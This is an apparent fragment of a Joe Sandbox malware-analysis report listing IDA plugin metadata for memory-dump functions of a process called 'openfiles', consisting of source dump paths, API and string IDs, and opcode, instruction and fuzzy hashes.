                            • Opcode Fuzzy Hash: f02741d8e6fe2dca8741dcc3dcb30a05445ea14a22c20625c8466c9686156b2e
                            • Instruction Fuzzy Hash: C6318472A012199FDB20DF29CC40BEE77BCEB45715F4445A5E849E3200EB30FA449BA2
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction ID: 68e767fc363d9b09f4c6ae811264e4549ffba3b84b6d0feda3ca8df347755ebf
                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction Fuzzy Hash: EE919E71E1021BDADB24DE69C881ABEB7A5AF44724F144F1EEC55E72C0E770E9408F21
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: 20e07c74faa1608948256d156d08cb181ae4995b0b991874d9f706b0788f2a78
                            • Instruction ID: 5f70bb5f04d64f9cca59d64546e4e1a179377cb9a27f9b5a66e31140af7966a2
                            • Opcode Fuzzy Hash: 20e07c74faa1608948256d156d08cb181ae4995b0b991874d9f706b0788f2a78
                            • Instruction Fuzzy Hash: 10813CB5D002699BDB31DB54CC44BEAB7B8AB09714F0446EAE919F7240E7706E80CF61